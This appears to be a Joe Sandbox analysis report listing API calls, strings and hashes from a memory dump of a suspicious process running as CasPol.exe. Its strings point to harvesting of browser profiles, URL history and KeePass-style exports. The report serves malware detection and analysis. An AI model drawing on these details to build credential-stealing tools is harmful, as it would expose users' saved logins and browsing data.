                                                                                                                                                              • {Unknown}, xrefs: 004132A6
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                                                                                              • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                                                                                              • API String ID: 4111938811-1819279800
                                                                                                                                                              • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                              • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                                                                                              • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                                                                                              • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                                                                                              APIs
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                                                                                              • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                                                                                              • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                                                                                              • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                                                                                              • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                                                                                              • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                                                                                              • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                                                                                              • EndDialog.USER32(?,?), ref: 0040135E
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0040136A
                                                                                                                                                              • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 00401398
                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                                                                                              • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                                                                                              • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 829165378-0
                                                                                                                                                              • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                              • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                                                                                              • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                                                                                              • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 00404172
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                              • wcscpy.MSVCRT ref: 004041D6
                                                                                                                                                              • wcscpy.MSVCRT ref: 004041E7
                                                                                                                                                              • memset.MSVCRT ref: 00404200
                                                                                                                                                              • memset.MSVCRT ref: 00404215
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0040422F
                                                                                                                                                              • wcscpy.MSVCRT ref: 00404242
                                                                                                                                                              • memset.MSVCRT ref: 0040426E
                                                                                                                                                              • memset.MSVCRT ref: 004042CD
                                                                                                                                                              • memset.MSVCRT ref: 004042E2
                                                                                                                                                              • _snwprintf.MSVCRT ref: 004042FE
                                                                                                                                                              • wcscpy.MSVCRT ref: 00404311
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                                                                                              • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                                                                                              • API String ID: 2454223109-1580313836
                                                                                                                                                              • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                              • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                                                                                              • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                                                                                              • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                                                                                              • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                                                                                              • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                                                                                              • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                                                                                              • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                                                                                              • memcpy.MSVCRT(?,?,00002008,/nosaveload,00000000,00000001), ref: 004115C8
                                                                                                                                                              • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                                                                                              • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                                                                                              • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                                                                                              • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                                                                                              • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                                                                                                • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                                                                                                • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                                                                              • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                                                                              • API String ID: 4054529287-3175352466
                                                                                                                                                              • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                              • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                                                                              • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                                                                              • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                                                                              APIs
                                                                                                                                                              • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                                                                              • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                                                                              • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                                                                              • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                                                                              • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                                                                              • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                                                                              • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                                                                              • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                                                              • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                                                                              • API String ID: 667068680-2887671607
                                                                                                                                                              • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                              • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                                                                              • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                                                                              • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                                                                              • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                              • API String ID: 1607361635-601624466
                                                                                                                                                              • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                              • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                                                                              • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                                                                              • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _snwprintf$memset$wcscpy
                                                                                                                                                              • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                                                                              • API String ID: 2000436516-3842416460
                                                                                                                                                              • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                              • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                                                                              • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                                                                              • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                                                                                • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                                                                                • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                                • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                                • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                                • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                                • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                                • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                                                                              • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                                                                              • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                                                                              • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                                                                              • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                                                                              • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                                                                              • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                                                                              • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                                                                              • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                                                                              • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1043902810-0
                                                                                                                                                              • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                              • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                                                                              • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                                                                              • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                                                                                                • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                                                                                              • free.MSVCRT ref: 0040E49A
                                                                                                                                                                • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                                                                                              • memset.MSVCRT ref: 0040E380
                                                                                                                                                                • Part of subcall function 0040AA29: wcslen.MSVCRT ref: 0040AA3C
                                                                                                                                                                • Part of subcall function 0040AA29: memcpy.MSVCRT(?,?,00000000,00000001,00401B3C,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040AA5B
                                                                                                                                                              • wcschr.MSVCRT ref: 0040E3B8
                                                                                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                                                                                                                                              • memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E407
                                                                                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E422
                                                                                                                                                              • memcpy.MSVCRT(?,-00000220,00000008,0044E518,00000000,00000000,74DF2EE0), ref: 0040E43D
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memcpy$_wcsicmpmemset$freewcschrwcslen
                                                                                                                                                              • String ID: $AccessCount$AccessedTime$CreationTime$EntryID$ExpiryTime$ModifiedTime$Url
                                                                                                                                                              • API String ID: 3849927982-2252543386
                                                                                                                                                              • Opcode ID: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                              • Instruction ID: 3bb3cf654da2d90f893253d259683e8481abe175d229eeda5eb464894a91a1db
                                                                                                                                                              • Opcode Fuzzy Hash: c30480054a5ca474dc40abe6212bc187cfeb1b733cbf080f7a891c76daa1d321
                                                                                                                                                              • Instruction Fuzzy Hash: DA512071E00309ABDF10EFA6DC45B9EB7B8AF54305F15443BA904F7291E678AA14CB58
                                                                                                                                                              APIs
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                                                                              • _snwprintf.MSVCRT ref: 0044488A
                                                                                                                                                              • wcscpy.MSVCRT ref: 004448B4
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                                                                              • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                                                                              • API String ID: 2899246560-1542517562
                                                                                                                                                              • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                              • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                                                                                              • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                                                                                              • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                                                                                • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                                                                              • memset.MSVCRT ref: 004085CF
                                                                                                                                                              • memset.MSVCRT ref: 004085F1
                                                                                                                                                              • memset.MSVCRT ref: 00408606
                                                                                                                                                              • strcmp.MSVCRT ref: 00408645
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                                                                              • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                                                                              • memset.MSVCRT ref: 0040870E
                                                                                                                                                              • strcmp.MSVCRT ref: 0040876B
                                                                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                                                                              • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                                                                              • String ID: ---
                                                                                                                                                              • API String ID: 3437578500-2854292027
                                                                                                                                                              • Opcode ID: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                              • Instruction ID: 4c5fbc017ddd4a43d5b0f69e9578b2b0908928dff5e121bfcb53d45818d158f6
                                                                                                                                                              • Opcode Fuzzy Hash: c5c02c04611bcd29229c4833ebed6afde2d02892c84083fd30bc2caee93791c4
                                                                                                                                                              • Instruction Fuzzy Hash: 256191B2C0421DAADF20DB948D819DEBBBCAB15314F1140FFE558B3141DA399BC4CBA9
                                                                                                                                                              APIs
                                                                                                                                                              • memset.MSVCRT ref: 0041087D
                                                                                                                                                              • memset.MSVCRT ref: 00410892
                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                                                                              • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                                                                              • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                                                                              • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                                                                              • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                                                                              • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                                                                              • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                                                                              • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                                                                              • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1010922700-0
                                                                                                                                                              • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                              • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                                                                                                                              • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                                                                                                                              • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                                                                              • malloc.MSVCRT ref: 004186B7
                                                                                                                                                              • free.MSVCRT ref: 004186C7
                                                                                                                                                              • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                                                                              • free.MSVCRT ref: 004186E0
                                                                                                                                                              • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                                                                              • malloc.MSVCRT ref: 004186FE
                                                                                                                                                              • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                                                                              • free.MSVCRT ref: 00418716
                                                                                                                                                              • free.MSVCRT ref: 0041872A
                                                                                                                                                              • free.MSVCRT ref: 00418749
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: free$FullNamePath$malloc$Version
                                                                                                                                                              • String ID: |A
                                                                                                                                                              • API String ID: 3356672799-1717621600
                                                                                                                                                              • Opcode ID: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                              • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                                                                                                                              • Opcode Fuzzy Hash: 66b970c2726a19c6cf161dcebd973c19408ec610aa0d83d05880a80435803f02
                                                                                                                                                              • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                                                                                                                              APIs
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000D.00000002.2139245890.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_13_2_400000_CasPol.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: _wcsicmp
                                                                                                                                                              • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                                                                              • API String ID: 2081463915-1959339147
                                                                                                                                                              • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
